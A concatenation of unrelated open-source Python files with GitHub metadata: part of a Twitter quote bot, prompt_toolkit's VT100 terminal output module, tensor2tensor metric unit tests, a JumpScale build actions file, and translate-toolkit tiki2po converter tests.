self.response.write(theTweet)
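        # Hypothetical quotes.csv row, per the column layout used above
        # ([text, author, source, who, handle]):
        #   Stay hungry; stay foolish.,Steve Jobs,Stanford 2005,,@Stanford
        # which would tweet: "Stay hungry; stay foolish.", Stanford 2005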
def dropNonFollower(self, api):
myID = api.me().id
# Get followers
followersList = api.followers_ids(myID)
# Get friends
friendsList = api.friends_ids(myID)
        # friends of ours who are not following back
nonFollowerList = list(set(friendsList) - set(followersList))
if len(nonFollowerList) > 0:
#self.response.write(nonFollowerList)
# Get non-followers in descending order and pick the last one
nonFollowerID = nonFollowerList[-1]
#nonFollower = api.get_user(nonFollowerID)
if nonFollowerID:
nonFollower = api.destroy_friendship(nonFollowerID)
self.response.write(nonFollower)
def saveFollowers(self, api, config):
myID = api.me().id
# Get followers
followersList = api.followers_ids(myID)
# Mongo API keys
apiURL = config.get('Mongolab', 'apiURL')
apiKey = config.get('Mongolab', 'apiKey')
database = config.get('Mongolab', 'database')
# Set API call headers
headers = {'content-type': 'application/json'}
def followBackFollower(self, api):
myID = api.me().id
# Get followers
followersList = api.followers_ids(myID)
# Get friends
friendsList = api.friends_ids(myID)
        # followers we are not yet following back
nonFollowingList = list(set(followersList) - set(friendsList))
# Find non-follwers and pick a random one
randNonFollowingID = random.choice(nonFollowingList)
#randNonFollowingID = nonFollowingList[random.randint(0, len(nonFollowingList)-1)]
#randNonFollowing = api.get_user(randNonFollowingID)
if randNonFollowingID:
randNonFollowing = api.create_friendship(randNonFollowingID)
self.response.write(randNonFollowing)
def addNewFollower(self, api):
myID = api.me().id
# Get followers
followerList = api.followers_ids(myID)
# Get a random follower
randFollowerID = followerList[random.randint(0, len(followerList)-1)]
        # Get list of friends of the random follower
friendList = api.friends_ids(randFollowerID)
#newFollowerID = friendList[random.randint(0, len(friendList)-1)]
newFollowerID = random.choice(friendList)
#newFollower = api.get_user(newFollowerID)
if newFollowerID:
newFollower = api.create_friendship(newFollowerID)
self.response.write(newFollower)
def log(self, message):
timestamp = strftime("%Y %b %d %H:%M:%S UTC: ", gmtime())
print (timestamp + message + '\n')
def get(self):
try:
self.runBot()
print("Ran Bot")
except TweepError as te:
            print(te.message)
app = webapp2.WSGIApplication([
('/bot', BotHandler)
], debug=False)
|
{
"content_hash": "153100ac65766a5e7ab1814b9377ad47",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 93,
"avg_line_length": 35.708333333333336,
"alnum_prop": 0.5957659609934989,
"repo_name": "fsiddiqi/quotedian",
"id": "9928dffc26d8ec47ff2bb2013b3eaecdadbbef3e",
"size": "6025",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bot.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "7951"
}
],
"symlink_target": ""
}
|
"""
Output for vt100 terminals.
A lot of thanks, regarding outputting of colors, goes to the Pygments project:
(We don't rely on Pygments anymore, because many things are very custom, and
everything has been highly optimized.)
http://pygments.org/
"""
from __future__ import unicode_literals
from prompt_toolkit.filters import to_simple_filter, Condition
from prompt_toolkit.layout.screen import Size
from prompt_toolkit.renderer import Output
from prompt_toolkit.styles import ANSI_COLOR_NAMES
from six.moves import range
import array
import errno
import os
import six
__all__ = (
'Vt100_Output',
)
FG_ANSI_COLORS = {
'ansidefault': 39,
'ansiblack': 30,
    'ansidarkgray': 90,
    'ansilightgray': 37,
'ansiwhite': 97,
# Low intensity.
'ansidarkred': 31,
'ansidarkgreen': 32,
'ansibrown': 33,
'ansidarkblue': 34,
'ansipurple': 35,
'ansiteal': 36,
# High intensity.
'ansired': 91,
'ansigreen': 92,
'ansiyellow': 93,
'ansiblue': 94,
'ansifuchsia': 95,
'ansiturquoise': 96,
}
BG_ANSI_COLORS = {
'ansidefault': 49,
'ansiblack': 40,
    'ansidarkgray': 100,
    'ansiwhite': 107,
    'ansilightgray': 47,
# Low intensity.
'ansidarkred': 41,
'ansidarkgreen': 42,
'ansibrown': 43,
'ansidarkblue': 44,
'ansipurple': 45,
'ansiteal': 46,
# High intensity.
'ansired': 101,
'ansigreen': 102,
'ansiyellow': 103,
'ansiblue': 104,
'ansifuchsia': 105,
'ansiturquoise': 106,
}
ANSI_COLORS_TO_RGB = {
'ansidefault': (0x00, 0x00, 0x00), # Don't use, 'default' doesn't really have a value.
'ansiblack': (0x00, 0x00, 0x00),
'ansidarkgray': (0x7f, 0x7f, 0x7f),
'ansiwhite': (0xff, 0xff, 0xff),
'ansilightgray': (0xe5, 0xe5, 0xe5),
# Low intensity.
'ansidarkred': (0xcd, 0x00, 0x00),
'ansidarkgreen': (0x00, 0xcd, 0x00),
'ansibrown': (0xcd, 0xcd, 0x00),
'ansidarkblue': (0x00, 0x00, 0xcd),
'ansipurple': (0xcd, 0x00, 0xcd),
'ansiteal': (0x00, 0xcd, 0xcd),
# High intensity.
'ansired': (0xff, 0x00, 0x00),
'ansigreen': (0x00, 0xff, 0x00),
'ansiyellow': (0xff, 0xff, 0x00),
'ansiblue': (0x00, 0x00, 0xff),
'ansifuchsia': (0xff, 0x00, 0xff),
'ansiturquoise': (0x00, 0xff, 0xff),
}
assert set(FG_ANSI_COLORS) == set(ANSI_COLOR_NAMES)
assert set(BG_ANSI_COLORS) == set(ANSI_COLOR_NAMES)
assert set(ANSI_COLORS_TO_RGB) == set(ANSI_COLOR_NAMES)
def _get_closest_ansi_color(r, g, b, exclude=()):
"""
Find closest ANSI color. Return it by name.
:param r: Red (Between 0 and 255.)
:param g: Green (Between 0 and 255.)
:param b: Blue (Between 0 and 255.)
:param exclude: A tuple of color names to exclude. (E.g. ``('ansired', )``.)
"""
assert isinstance(exclude, tuple)
# When we have a bit of saturation, avoid the gray-like colors, otherwise,
# too often the distance to the gray color is less.
saturation = abs(r - g) + abs(g - b) + abs(b - r) # Between 0..510
if saturation > 30:
exclude += ('ansilightgray', 'ansidarkgray', 'ansiwhite', 'ansiblack')
# Take the closest color.
# (Thanks to Pygments for this part.)
distance = 257*257*3 # "infinity" (>distance from #000000 to #ffffff)
match = 'ansidefault'
for name, (r2, g2, b2) in ANSI_COLORS_TO_RGB.items():
if name != 'ansidefault' and name not in exclude:
d = (r - r2) ** 2 + (g - g2) ** 2 + (b - b2) ** 2
if d < distance:
match = name
distance = d
return match
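# For example, _get_closest_ansi_color(0xff, 0x00, 0x00) returns 'ansired':
# saturation is high, so the gray-like candidates are excluded and pure red
# is an exact match (distance 0).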
class _16ColorCache(dict):
"""
Cache which maps (r, g, b) tuples to 16 ansi colors.
:param bg: Cache for background colors, instead of foreground.
"""
def __init__(self, bg=False):
assert isinstance(bg, bool)
self.bg = bg
def get_code(self, value, exclude=()):
"""
Return a (ansi_code, ansi_name) tuple. (E.g. ``(44, 'ansiblue')``.) for
a given (r,g,b) value.
"""
key = (value, exclude)
if key not in self:
self[key] = self._get(value, exclude)
return self[key]
def _get(self, value, exclude=()):
r, g, b = value
match = _get_closest_ansi_color(r, g, b, exclude=exclude)
# Turn color name into code.
if self.bg:
code = BG_ANSI_COLORS[match]
else:
code = FG_ANSI_COLORS[match]
self[value] = code
return code, match
class _256ColorCache(dict):
"""
    Cache which maps (r, g, b) tuples to 256 colors.
"""
def __init__(self):
# Build color table.
colors = []
# colors 0..15: 16 basic colors
colors.append((0x00, 0x00, 0x00)) # 0
colors.append((0xcd, 0x00, 0x00)) # 1
colors.append((0x00, 0xcd, 0x00)) # 2
colors.append((0xcd, 0xcd, 0x00)) # 3
colors.append((0x00, 0x00, 0xee)) # 4
colors.append((0xcd, 0x00, 0xcd)) # 5
colors.append((0x00, 0xcd, 0xcd)) # 6
colors.append((0xe5, 0xe5, 0xe5)) # 7
colors.append((0x7f, 0x7f, 0x7f)) # 8
colors.append((0xff, 0x00, 0x00)) # 9
colors.append((0x00, 0xff, 0x00)) # 10
colors.append((0xff, 0xff, 0x00)) # 11
colors.append((0x5c, 0x5c, 0xff)) # 12
colors.append((0xff, 0x00, 0xff)) # 13
colors.append((0x00, 0xff, 0xff)) # 14
colors.append((0xff, 0xff, 0xff)) # 15
# colors 16..232: the 6x6x6 color cube
valuerange = (0x00, 0x5f, 0x87, 0xaf, 0xd7, 0xff)
for i in range(217):
r = valuerange[(i // 36) % 6]
g = valuerange[(i // 6) % 6]
b = valuerange[i % 6]
colors.append((r, g, b))
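        # (Note: the loop above runs 217 times, one past the 216 cube colors,
        # so index 232 holds a duplicate black; this keeps the grayscale
        # entries below aligned with xterm palette indices 233..253.)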
# colors 233..253: grayscale
for i in range(1, 22):
v = 8 + i * 10
colors.append((v, v, v))
self.colors = colors
def __missing__(self, value):
r, g, b = value
# Find closest color.
# (Thanks to Pygments for this!)
distance = 257*257*3 # "infinity" (>distance from #000000 to #ffffff)
match = 0
for i, (r2, g2, b2) in enumerate(self.colors):
d = (r - r2) ** 2 + (g - g2) ** 2 + (b - b2) ** 2
if d < distance:
match = i
distance = d
# Turn color name into code.
self[value] = match
return match
_16_fg_colors = _16ColorCache(bg=False)
_16_bg_colors = _16ColorCache(bg=True)
_256_colors = _256ColorCache()
class _EscapeCodeCache(dict):
"""
Cache for VT100 escape codes. It maps
    (fgcolor, bgcolor, bold, underline, italic, blink, reverse) tuples to VT100 escape sequences.
:param true_color: When True, use 24bit colors instead of 256 colors.
"""
def __init__(self, true_color=False, ansi_colors_only=False):
assert isinstance(true_color, bool)
self.true_color = true_color
self.ansi_colors_only = to_simple_filter(ansi_colors_only)
def __missing__(self, attrs):
fgcolor, bgcolor, bold, underline, italic, blink, reverse = attrs
parts = []
parts.extend(self._colors_to_code(fgcolor, bgcolor))
if bold:
parts.append('1')
if italic:
parts.append('3')
if blink:
parts.append('5')
if underline:
parts.append('4')
if reverse:
parts.append('7')
if parts:
result = '\x1b[0;' + ';'.join(parts) + 'm'
else:
result = '\x1b[0m'
self[attrs] = result
return result
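    # For example, the attrs tuple (None, None, True, False, False, False, False)
    # (bold only, default colors) maps to '\x1b[0;1m', while an all-default
    # tuple maps to the plain reset sequence '\x1b[0m'.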
def _color_name_to_rgb(self, color):
" Turn 'ffffff', into (0xff, 0xff, 0xff). "
try:
rgb = int(color, 16)
except ValueError:
raise
else:
r = (rgb >> 16) & 0xff
g = (rgb >> 8) & 0xff
b = rgb & 0xff
return r, g, b
def _colors_to_code(self, fg_color, bg_color):
" Return a tuple with the vt100 values that represent this color. "
# When requesting ANSI colors only, and both fg/bg color were converted
# to ANSI, ensure that the foreground and background color are not the
        # same. (Unless they were explicitly defined to be the same color.)
fg_ansi = [()]
def get(color, bg):
table = BG_ANSI_COLORS if bg else FG_ANSI_COLORS
if color is None:
return ()
# 16 ANSI colors. (Given by name.)
elif color in table:
return (table[color], )
# RGB colors. (Defined as 'ffffff'.)
else:
try:
rgb = self._color_name_to_rgb(color)
except ValueError:
return ()
# When only 16 colors are supported, use that.
if self.ansi_colors_only():
if bg: # Background.
if fg_color != bg_color:
exclude = (fg_ansi[0], )
else:
exclude = ()
code, name = _16_bg_colors.get_code(rgb, exclude=exclude)
return (code, )
else: # Foreground.
code, name = _16_fg_colors.get_code(rgb)
fg_ansi[0] = name
return (code, )
# True colors. (Only when this feature is enabled.)
elif self.true_color:
r, g, b = rgb
return (48 if bg else 38, 2, r, g, b)
# 256 RGB colors.
else:
return (48 if bg else 38, 5, _256_colors[rgb])
result = []
result.extend(get(fg_color, False))
result.extend(get(bg_color, True))
return map(six.text_type, result)
def _get_size(fileno):
# Thanks to fabric (fabfile.org), and
# http://sqizit.bartletts.id.au/2011/02/14/pseudo-terminals-in-python/
"""
Get the size of this pseudo terminal.
:param fileno: stdout.fileno()
:returns: A (rows, cols) tuple.
"""
# Inline imports, because these modules are not available on Windows.
# (This file is used by ConEmuOutput, which is used on Windows.)
import fcntl
import termios
# Buffer for the C call
buf = array.array(b'h' if six.PY2 else u'h', [0, 0, 0, 0])
# Do TIOCGWINSZ (Get)
# Note: We should not pass 'True' as a fourth parameter to 'ioctl'. (True
# is the default.) This causes segmentation faults on some systems.
# See: https://github.com/jonathanslenders/python-prompt-toolkit/pull/364
fcntl.ioctl(fileno, termios.TIOCGWINSZ, buf)
# Return rows, cols
return buf[0], buf[1]
class Vt100_Output(Output):
"""
:param get_size: A callable which returns the `Size` of the output terminal.
:param stdout: Any object with has a `write` and `flush` method + an 'encoding' property.
:param true_color: Use 24bit color instead of 256 colors. (Can be a :class:`SimpleFilter`.)
When `ansi_colors_only` is set, only 16 colors are used.
:param ansi_colors_only: Restrict to 16 ANSI colors only.
:param term: The terminal environment variable. (xterm, xterm-256color, linux, ...)
:param write_binary: Encode the output before writing it. If `True` (the
default), the `stdout` object is supposed to expose an `encoding` attribute.
"""
def __init__(self, stdout, get_size, true_color=False,
ansi_colors_only=None, term=None, write_binary=True):
assert callable(get_size)
assert term is None or isinstance(term, six.text_type)
assert all(hasattr(stdout, a) for a in ('write', 'flush'))
if write_binary:
assert hasattr(stdout, 'encoding')
self._buffer = []
self.stdout = stdout
self.write_binary = write_binary
self.get_size = get_size
self.true_color = to_simple_filter(true_color)
self.term = term or 'xterm'
# ANSI colors only?
if ansi_colors_only is None:
# When not given, use the following default.
ANSI_COLORS_ONLY = bool(os.environ.get(
'PROMPT_TOOLKIT_ANSI_COLORS_ONLY', False))
@Condition
def ansi_colors_only():
return ANSI_COLORS_ONLY or term in ('linux', 'eterm-color')
else:
ansi_colors_only = to_simple_filter(ansi_colors_only)
self.ansi_colors_only = ansi_colors_only
# Cache for escape codes.
self._escape_code_cache = _EscapeCodeCache(ansi_colors_only=ansi_colors_only)
self._escape_code_cache_true_color = _EscapeCodeCache(
true_color=True, ansi_colors_only=ansi_colors_only)
@classmethod
def from_pty(cls, stdout, true_color=False, ansi_colors_only=None, term=None):
"""
Create an Output class from a pseudo terminal.
(This will take the dimensions by reading the pseudo
terminal attributes.)
"""
assert stdout.isatty()
def get_size():
rows, columns = _get_size(stdout.fileno())
return Size(rows=rows, columns=columns)
return cls(stdout, get_size, true_color=true_color,
ansi_colors_only=ansi_colors_only, term=term)
def fileno(self):
" Return file descriptor. "
return self.stdout.fileno()
def encoding(self):
" Return encoding used for stdout. "
return self.stdout.encoding
def write_raw(self, data):
"""
Write raw data to output.
"""
self._buffer.append(data)
def write(self, data):
"""
Write text to output.
(Removes vt100 escape codes. -- used for safely writing text.)
"""
self._buffer.append(data.replace('\x1b', '?'))
def set_title(self, title):
"""
Set terminal title.
"""
if self.term not in ('linux', 'eterm-color'): # Not supported by the Linux console.
self.write_raw('\x1b]2;%s\x07' % title.replace('\x1b', '').replace('\x07', ''))
def clear_title(self):
self.set_title('')
def erase_screen(self):
"""
Erases the screen with the background colour and moves the cursor to
home.
"""
self.write_raw('\x1b[2J')
def enter_alternate_screen(self):
self.write_raw('\x1b[?1049h\x1b[H')
def quit_alternate_screen(self):
self.write_raw('\x1b[?1049l')
def enable_mouse_support(self):
self.write_raw('\x1b[?1000h')
# Enable urxvt Mouse mode. (For terminals that understand this.)
self.write_raw('\x1b[?1015h')
# Also enable Xterm SGR mouse mode. (For terminals that understand this.)
self.write_raw('\x1b[?1006h')
# Note: E.g. lxterminal understands 1000h, but not the urxvt or sgr
# extensions.
def disable_mouse_support(self):
self.write_raw('\x1b[?1000l')
self.write_raw('\x1b[?1015l')
self.write_raw('\x1b[?1006l')
def erase_end_of_line(self):
"""
Erases from the current cursor position to the end of the current line.
"""
self.write_raw('\x1b[K')
def erase_down(self):
"""
Erases the screen from the current line down to the bottom of the
screen.
"""
self.write_raw('\x1b[J')
def reset_attributes(self):
self.write_raw('\x1b[0m')
def set_attributes(self, attrs):
"""
Create new style and output.
:param attrs: `Attrs` instance.
"""
if self.true_color() and not self.ansi_colors_only():
self.write_raw(self._escape_code_cache_true_color[attrs])
else:
self.write_raw(self._escape_code_cache[attrs])
def disable_autowrap(self):
self.write_raw('\x1b[?7l')
def enable_autowrap(self):
self.write_raw('\x1b[?7h')
def enable_bracketed_paste(self):
self.write_raw('\x1b[?2004h')
def disable_bracketed_paste(self):
self.write_raw('\x1b[?2004l')
def cursor_goto(self, row=0, column=0):
""" Move cursor position. """
self.write_raw('\x1b[%i;%iH' % (row, column))
def cursor_up(self, amount):
if amount == 0:
pass
elif amount == 1:
self.write_raw('\x1b[A')
else:
self.write_raw('\x1b[%iA' % amount)
def cursor_down(self, amount):
if amount == 0:
pass
elif amount == 1:
# Note: Not the same as '\n', '\n' can cause the window content to
# scroll.
self.write_raw('\x1b[B')
else:
self.write_raw('\x1b[%iB' % amount)
def cursor_forward(self, amount):
if amount == 0:
pass
elif amount == 1:
self.write_raw('\x1b[C')
else:
self.write_raw('\x1b[%iC' % amount)
def cursor_backward(self, amount):
if amount == 0:
pass
elif amount == 1:
self.write_raw('\b') # '\x1b[D'
else:
self.write_raw('\x1b[%iD' % amount)
def hide_cursor(self):
self.write_raw('\x1b[?25l')
def show_cursor(self):
self.write_raw('\x1b[?12l\x1b[?25h') # Stop blinking cursor and show.
def flush(self):
"""
Write to output stream and flush.
"""
if not self._buffer:
return
data = ''.join(self._buffer)
try:
# (We try to encode ourself, because that way we can replace
# characters that don't exist in the character set, avoiding
# UnicodeEncodeError crashes. E.g. u'\xb7' does not appear in 'ascii'.)
            # My Arch Linux installation of July 2015 reported 'ANSI_X3.4-1968'
# for sys.stdout.encoding in xterm.
if self.write_binary:
if hasattr(self.stdout, 'buffer'):
out = self.stdout.buffer # Py3.
else:
out = self.stdout
out.write(data.encode(self.stdout.encoding or 'utf-8', 'replace'))
else:
self.stdout.write(data)
self.stdout.flush()
except IOError as e:
if e.args and e.args[0] == errno.EINTR:
                # Interrupted system call. Can happen in case of a window
# resize signal. (Just ignore. The resize handler will render
# again anyway.)
pass
elif e.args and e.args[0] == 0:
# This can happen when there is a lot of output and the user
# sends a KeyboardInterrupt by pressing Control-C. E.g. in
# a Python REPL when we execute "while True: print('test')".
# (The `ptpython` REPL uses this `Output` class instead of
# `stdout` directly -- in order to be network transparent.)
# So, just ignore.
pass
else:
raise
self._buffer = []
def ask_for_cpr(self):
"""
Asks for a cursor position report (CPR).
"""
self.write_raw('\x1b[6n')
self.flush()
def bell(self):
" Sound bell. "
self.write_raw('\a')
self.flush()
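# Hedged usage sketch (added for illustration; not part of the original
# module): drive Vt100_Output directly against a real tty. Everything used
# below -- from_pty, erase_screen, cursor_goto, write, flush -- is defined
# above; the only assumptions are running this module as a script and that
# stdout is an actual terminal (from_pty asserts isatty()).
if __name__ == '__main__':
    import sys
    _out = Vt100_Output.from_pty(sys.stdout, term=u'xterm-256color')
    _out.erase_screen()            # clear and...
    _out.cursor_goto(0, 0)         # ...home the cursor
    _out.write(u'Hello from Vt100_Output!\n')
    _out.flush()                   # nothing reaches stdout until flush()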
|
{
"content_hash": "dec758fdccb52c8fd8f1857f4819512a",
"timestamp": "",
"source": "github",
"line_count": 630,
"max_line_length": 95,
"avg_line_length": 31.214285714285715,
"alnum_prop": 0.5445715738621917,
"repo_name": "lancezlin/ml_template_py",
"id": "4568ee3c2b3b4a3f7a9f9fe5cbcf2a9c8e382259",
"size": "19665",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "lib/python2.7/site-packages/prompt_toolkit/terminal/vt100_output.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "326933"
},
{
"name": "C++",
"bytes": "14430"
},
{
"name": "CSS",
"bytes": "7806"
},
{
"name": "FORTRAN",
"bytes": "3200"
},
{
"name": "HTML",
"bytes": "596861"
},
{
"name": "JavaScript",
"bytes": "4020233"
},
{
"name": "Jupyter Notebook",
"bytes": "517957"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "Python",
"bytes": "41191064"
},
{
"name": "Shell",
"bytes": "3373"
},
{
"name": "Smarty",
"bytes": "26298"
}
],
"symlink_target": ""
}
|
"""Tests for tensor2tensor.utils.metrics."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.utils import metrics
import tensorflow as tf
class MetricsTest(tf.test.TestCase):
def testAccuracyMetric(self):
predictions = np.random.randint(1, 5, size=(12, 12, 12, 1))
targets = np.random.randint(1, 5, size=(12, 12, 12, 1))
expected = np.mean((predictions == targets).astype(float))
with self.test_session() as session:
scores, _ = metrics.padded_accuracy(
tf.one_hot(predictions, depth=5, dtype=tf.float32),
tf.constant(targets, dtype=tf.int32))
a = tf.reduce_mean(scores)
session.run(tf.global_variables_initializer())
actual = session.run(a)
self.assertAlmostEqual(actual, expected)
def testAccuracyTopKMetric(self):
predictions = np.random.randint(1, 5, size=(12, 12, 12, 1))
targets = np.random.randint(1, 5, size=(12, 12, 12, 1))
expected = np.mean((predictions == targets).astype(float))
with self.test_session() as session:
predicted = tf.one_hot(predictions, depth=5, dtype=tf.float32)
scores1, _ = metrics.padded_accuracy_topk(
predicted, tf.constant(targets, dtype=tf.int32), k=1)
scores2, _ = metrics.padded_accuracy_topk(
predicted, tf.constant(targets, dtype=tf.int32), k=7)
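      # With depth=5 one-hot predictions, the top-7 set necessarily contains
      # every class, so top-k accuracy at k=7 must be exactly 1.0 (asserted
      # below); k=1 reduces to plain padded accuracy.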
a1 = tf.reduce_mean(scores1)
a2 = tf.reduce_mean(scores2)
session.run(tf.global_variables_initializer())
actual1, actual2 = session.run([a1, a2])
self.assertAlmostEqual(actual1, expected)
self.assertAlmostEqual(actual2, 1.0)
def testSequenceAccuracyMetric(self):
predictions = np.random.randint(4, size=(12, 12, 12, 1))
targets = np.random.randint(4, size=(12, 12, 12, 1))
expected = np.mean(
np.prod((predictions == targets).astype(float), axis=(1, 2)))
with self.test_session() as session:
scores, _ = metrics.padded_sequence_accuracy(
tf.one_hot(predictions, depth=4, dtype=tf.float32),
tf.constant(targets, dtype=tf.int32))
a = tf.reduce_mean(scores)
session.run(tf.global_variables_initializer())
actual = session.run(a)
self.assertEqual(actual, expected)
def testRMSEMetric(self):
predictions = np.full((10, 1), 1) # All 1's
targets = np.full((10, 1), 3) # All 3's
expected = np.sqrt(np.mean((predictions - targets)**2)) # RMSE = 2.0
with self.test_session() as session:
rmse, _ = metrics.padded_rmse(
tf.constant(predictions, dtype=tf.int32),
tf.constant(targets, dtype=tf.int32))
session.run(tf.global_variables_initializer())
actual = session.run(rmse)
self.assertEqual(actual, expected)
def testSequenceEditDistanceMetric(self):
predictions = np.array([[3, 4, 5, 1, 0, 0],
[2, 1, 3, 4, 0, 0],
[2, 1, 3, 4, 0, 0]])
# Targets are just a bit different:
# - first sequence has a different prediction
# - second sequence has a different prediction and one extra step
# - third sequence is identical
targets = np.array([[5, 4, 5, 1, 0, 0],
[2, 5, 3, 4, 1, 0],
[2, 1, 3, 4, 0, 0]])
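    # Total edit distance is 1 + 2 + 0 = 3 over 13 non-padding target tokens
    # (4 + 5 + 4), which gives the expected score of 3.0 / 13 asserted below.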
    # Reshape to the input format expected by the metric fns.
predictions = np.reshape(predictions, [3, 6, 1, 1])
targets = np.reshape(targets, [3, 6, 1, 1])
with self.test_session() as session:
scores, weight = metrics.sequence_edit_distance(
tf.one_hot(predictions, depth=6, dtype=tf.float32),
tf.constant(targets, dtype=tf.int32))
session.run(tf.global_variables_initializer())
actual_scores, actual_weight = session.run([scores, weight])
self.assertAlmostEqual(actual_scores, 3.0 / 13)
self.assertEqual(actual_weight, 13)
def testNegativeLogPerplexity(self):
predictions = np.random.randint(4, size=(12, 12, 12, 1))
targets = np.random.randint(4, size=(12, 12, 12, 1))
with self.test_session() as session:
scores, _ = metrics.padded_neg_log_perplexity(
tf.one_hot(predictions, depth=4, dtype=tf.float32),
tf.constant(targets, dtype=tf.int32))
a = tf.reduce_mean(scores)
session.run(tf.global_variables_initializer())
actual = session.run(a)
self.assertEqual(actual.shape, ())
def testSigmoidAccuracyOneHot(self):
logits = np.array([
[-1., 1.],
[1., -1.],
[-1., 1.],
[1., -1.]
])
labels = np.array([
[0, 1],
[1, 0],
[1, 0],
[0, 1]
])
logits = np.expand_dims(np.expand_dims(logits, 1), 1)
labels = np.expand_dims(np.expand_dims(labels, 1), 1)
with self.test_session() as session:
score, _ = metrics.sigmoid_accuracy_one_hot(logits, labels)
session.run(tf.global_variables_initializer())
session.run(tf.local_variables_initializer())
s = session.run(score)
self.assertEqual(s, 0.5)
def testSigmoidPrecisionOneHot(self):
logits = np.array([
[-1., 1.],
[1., -1.],
[1., -1.],
[1., -1.]
])
labels = np.array([
[0, 1],
[0, 1],
[0, 1],
[0, 1]
])
logits = np.expand_dims(np.expand_dims(logits, 1), 1)
labels = np.expand_dims(np.expand_dims(labels, 1), 1)
with self.test_session() as session:
score, _ = metrics.sigmoid_precision_one_hot(logits, labels)
session.run(tf.global_variables_initializer())
session.run(tf.local_variables_initializer())
s = session.run(score)
self.assertEqual(s, 0.25)
def testSigmoidRecallOneHot(self):
logits = np.array([
[-1., 1.],
[1., -1.],
[1., -1.],
[1., -1.]
])
labels = np.array([
[0, 1],
[0, 1],
[0, 1],
[0, 1]
])
logits = np.expand_dims(np.expand_dims(logits, 1), 1)
labels = np.expand_dims(np.expand_dims(labels, 1), 1)
with self.test_session() as session:
score, _ = metrics.sigmoid_recall_one_hot(logits, labels)
session.run(tf.global_variables_initializer())
session.run(tf.local_variables_initializer())
s = session.run(score)
self.assertEqual(s, 0.25)
def testSigmoidCrossEntropyOneHot(self):
logits = np.array([
[-1., 1.],
[1., -1.],
[1., -1.],
[1., -1.]
])
labels = np.array([
[0, 1],
[1, 0],
[0, 0],
[0, 1]
])
logits = np.expand_dims(np.expand_dims(logits, 1), 1)
labels = np.expand_dims(np.expand_dims(labels, 1), 1)
with self.test_session() as session:
score, _ = metrics.sigmoid_cross_entropy_one_hot(logits, labels)
session.run(tf.global_variables_initializer())
session.run(tf.local_variables_initializer())
s = session.run(score)
self.assertAlmostEqual(s, 0.688, places=3)
def testRocAuc(self):
logits = np.array([
[-1., 1.],
[1., -1.],
[1., -1.],
[1., -1.]
])
labels = np.array([
[1],
[0],
[1],
[0]
])
logits = np.expand_dims(np.expand_dims(logits, 1), 1)
labels = np.expand_dims(np.expand_dims(labels, 1), 1)
with self.test_session() as session:
score, _ = metrics.roc_auc(logits, labels)
session.run(tf.global_variables_initializer())
session.run(tf.local_variables_initializer())
s = session.run(score)
self.assertAlmostEqual(s, 0.750, places=3)
def testMultilabelMatch3(self):
predictions = np.random.randint(1, 5, size=(100, 1, 1, 1))
targets = np.random.randint(1, 5, size=(100, 10, 1, 1))
weights = np.random.randint(0, 2, size=(100, 1, 1, 1))
targets *= weights
predictions_repeat = np.repeat(predictions, 10, axis=1)
expected = (predictions_repeat == targets).astype(float)
expected = np.sum(expected, axis=(1, 2, 3))
expected = np.minimum(expected / 3.0, 1.)
expected = np.sum(expected * weights[:, 0, 0, 0]) / weights.shape[0]
with self.test_session() as session:
scores, weights_ = metrics.multilabel_accuracy_match3(
tf.one_hot(predictions, depth=5, dtype=tf.float32),
tf.constant(targets, dtype=tf.int32))
a, a_op = tf.metrics.mean(scores, weights_)
session.run(tf.local_variables_initializer())
session.run(tf.global_variables_initializer())
_ = session.run(a_op)
actual = session.run(a)
self.assertAlmostEqual(actual, expected, places=6)
if __name__ == '__main__':
tf.test.main()
|
{
"content_hash": "3e3857279f9c8aac089a6e3f7d50343f",
"timestamp": "",
"source": "github",
"line_count": 244,
"max_line_length": 73,
"avg_line_length": 35.217213114754095,
"alnum_prop": 0.5982776678691959,
"repo_name": "vthorsteinsson/tensor2tensor",
"id": "3e504d88112aa02200f63e50f5c946e31d774120",
"size": "9198",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensor2tensor/utils/metrics_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "34646"
},
{
"name": "JavaScript",
"bytes": "78396"
},
{
"name": "Jupyter Notebook",
"bytes": "2423366"
},
{
"name": "Python",
"bytes": "3566836"
},
{
"name": "Shell",
"bytes": "7888"
}
],
"symlink_target": ""
}
|
def init(job):
from JumpScale.baselib.atyourservice81.AtYourServiceBuild import ensure_container
ensure_container(job.service, root=False)
def install(job):
from JumpScale.baselib.atyourservice81.AtYourServiceBuild import build
def build_func(cuisine):
cuisine.systemservices.aydostor.build(start=False)
build(job.service, build_func)
|
{
"content_hash": "2238591cb86e443f1b3f6cfbed2683d7",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 85,
"avg_line_length": 30.583333333333332,
"alnum_prop": 0.7683923705722071,
"repo_name": "Jumpscale/ays_build",
"id": "e5a3e529661e45a53723f416306675b223bc5119",
"size": "367",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "actorTemplates/store/actions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "21616"
}
],
"symlink_target": ""
}
|
from translate.convert import tiki2po
from translate.storage import tiki
from translate.convert import test_convert
from translate.misc import wStringIO
class TestTiki2Po:
def test_converttiki_defaults(self):
inputfile = """
"zero_source" => "zero_target",
// ### Start of unused words
"one_source" => "one_target",
// ### end of unused words
"""
outputfile = wStringIO.StringIO()
tiki2po.converttiki(inputfile, outputfile)
output = outputfile.getvalue()
assert '#: translated' in output
assert 'msgid "zero_source"' in output
assert "one_source" not in output
def test_converttiki_includeunused(self):
inputfile = """
"zero_source" => "zero_target",
// ### Start of unused words
"one_source" => "one_target",
// ### end of unused words
"""
outputfile = wStringIO.StringIO()
tiki2po.converttiki(inputfile, outputfile, includeunused=True)
output = outputfile.getvalue()
assert '#: translated' in output
assert 'msgid "zero_source"' in output
assert '#: unused' in output
assert 'msgid "one_source"' in output
class TestTiki2PoCommand(test_convert.TestConvertCommand, TestTiki2Po):
"""Tests running actual tiki2po commands on files"""
convertmodule = tiki2po
defaultoptions = {}
def test_help(self):
"""tests getting help"""
options = test_convert.TestConvertCommand.test_help(self)
